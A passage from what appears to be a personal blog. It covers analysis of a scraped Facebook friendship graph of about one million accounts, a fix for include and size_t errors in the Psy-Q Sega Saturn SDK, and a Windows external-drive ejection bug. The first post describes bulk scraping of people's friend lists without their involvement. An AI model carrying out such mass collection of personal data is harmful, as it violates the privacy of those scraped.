In the past few years, a lot of people started realizing just how much stuff they were giving away publicly on their Facebook profile, and consequently made great use of the privacy settings that allow, for example, restricting who can see your friends list. A small step for man, but a giant leap in breaking my scraper.‌‌ People with a private friends list appear on the graph as leaves, i.e. nodes that only have one neighbour. I ignore those nodes while processing the graph.

It stores the relationships as adjacency lists in a huge JSON file (74 MiB as I'm writing), which are then converted to GEXF using NetworkX.

Now in possession of a real graph, I can fire up Gephi and start analyzing stuff.


The graph you're seeing contains around 1 million nodes, each node corresponding to a Facebook account and each edge meaning two accounts are friends. The nodes and edges are colored according to their modularity class (fancy name for the virtual "community" or "cluster" they belong to), which was computed automatically using equally fancy graph-theoretical algorithms.

At 1 million nodes, the time necessary to layout the graph and compute the useful measurements is about 60 hours (most of which is spent on calculating the centrality for each node) on my 4th-gen i7 machine.

About those small-world networks. One of their most remarkable properties is that the average length of the shortest path between two nodes chosen at random grows proportionally to the logarithm of the total number of nodes. In other words, even with huge graphs, you'll usually get unexpectedly short paths between nodes.

But what does that mean in practice? On this graph, there are people from dozens of different places where I've lived, studied, worked. Despite that, my dad living near Switzerland is only three handshakes away from my colleagues in the other side of the country.

More formally, the above graph has a diameter of 7. That means that there are no two nodes on the graph that are more than 6 "online handshakes" away from each other.

In the figure above, we can see the cumulative distribution of degrees on the graph. For a given number N, the curve shows us how many individuals have N or more friends. Intuitively, the curve is monotonically decreasing, because as N gets bigger and bigger, there are less and less people having that many friends. On the other hand, almost everyone has at least 1 friend.

You'll maybe notice a steep hill at the end, around N=5000. This is due to the fact that 5000 is the maximum number of friends you can have on Facebook; so you'll get many people with a number of friends very close to it simply because they've "filled up" their friends list.

We can enumerate all pairs of individuals on the graph and compute the length of the shortest path between the two, which gives the following figure:

In this graph, the average distance between individuals is 3.3, which is slightly lower than the one found in the Facebook paper (4.7). This can be explained by the fact that the researchers had access to the entire Facebook database whereas I only have access to the graph I obtained through scraping.

(PDF) The Anatomy of the Facebook Social Graph
PDF | We study the structure of the social graph of active Facebook users, the largest social network ever analyzed. We compute numerous features of the... | Find, read and cite all the research you need on ResearchGate
The Facebook paper

Fix for the Psy-Q Saturn SDK

If you ever want to write code for the Sega Saturn using the Psy-Q SDK (available here), you may encounter a small problem with the toolset when using #include directives.

Example:

#include "abc.h"

int main()
{
    int b = a + 43;
    return 0;
}
main.c
C:\Psyq\bin>ccsh -ITHING/ -S main.c
build.bat
int a = 98;
abc.h

This will crash with the following error: main.c:1: abc.h: No such file or directory, which is quite strange given that we explicitely told the compiler to look in that THING folder.

What we have:

  • CCSH.EXE : main compiler executable (C Compiler Super-H)
  • CPPSH.EXE preprocessor (C PreProcessor Super-H)

CCSH calls CPPSH with the source file first to get a raw code file to compile, and then actually compiles it. Here, we can see by running CPPSH alone that it still triggers the error, which means the problem effectively comes from CPPSH. After a thorough analysis in Ida, it seems that even though the code that handles parsing the command-line parameters related to include directories, those paths aren't actually added to the program's internal directory array and thus never actually used. I could have decompiled it and fixed it myself, but I found a faster and simpler way: use the PSX one.

Though CCSH and CCPSX are very different in nature (one compiles for Super-H and one for MIPS), their preprocessors are actually almost identical – when we think about it, it makes sense: the C language doesn't depend on the underlying architecture (most of the time), so why would its preprocessor do?

So here's the fix: rename CCSH to something else and copy CCPSX to CCSH. Solves all problems and finally allows compiling C code for the Sega Saturn on Windows (the only other working SDK on the Internet is for DOS, which requires using DOSBox and 8.3 filenames, which makes big projects complicated to organize).

That's nice and all but can we compile actual code? Seems that the answer is no. Here is a basic file:

#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%d\n", 42);

	return 0;
}

Compiling this will give the following error:

In file included from bin/main.c:2:
D:\SATURN\INCLUDE\stdlib.h:7: conflicting types for 'size_t'
D:\SATURN\INCLUDE\stddef.h:166: previous declaration of 'size_t'

Weird, eh?

It seems that the STDLIB.H file in the SDK is somehow wrong, in that it has the following at the top:

#ifndef	__SIZE_TYPE__DEF
#define	__SIZE_TYPE__DEF	unsigned int
typedef	__SIZE_TYPE__DEF	size_t;
#endif
STDLIB.H

Whereas its friend STDDEF.H looks like this:

#ifndef __SIZE_TYPE__
#define __SIZE_TYPE__ long unsigned int
#endif
#if !(defined (__GNUG__) && defined (size_t))
typedef __SIZE_TYPE__ size_t;
#endif /* !(defined (__GNUG__) && defined (size_t)) */
STDDEF.H

Two incompatible declarations, the compiler dies. The simple fix is to remove the DEF at the end of the names in STDLIB.H, to get something like this:

#ifndef	__SIZE_TYPE__
#define	__SIZE_TYPE__	unsigned int
typedef	__SIZE_TYPE__	size_t;
#endif
STDLIB.H

Solving bizarre hard drive corruption issues

I've recently encountered some pretty weird problems with my two USB3 external hard drives. Disk disconnecting when opening specific files, and refusing to reconnect on the computer until I plug it into another computer, then it works again, and so on.

Then I started noticing a pattern. The files that trigger the crash are always files that I have opened on another computer with that hard drive, which should give you a clue on what this might be about.

It seems that there's a bug in Windows' drive ejection system, which basically means that if you plug a hard drive on a computer, open a file in any software that keeps the descriptor open all the time (I'm looking at you, IDA Pro), and then eject the drive without closing the software first (which sometimes happens), the file will somehow still be marked as open in the NTFS attributes, and when you'll try to open it on another computer, Windows will flip out and disconnect the hard drive. And until you plug the HDD back on the other computer, it will refuse to read it on the first one, showing as RAW in the management console, even in another OS (I tried Ubuntu and FreeBSD) as long as you stay on that computer. But then, if you do plug it back, then it will magically unlock and it will work again on all computers. This took me about a week to figure out. Hope it'll have helped you figure it out in less time than me.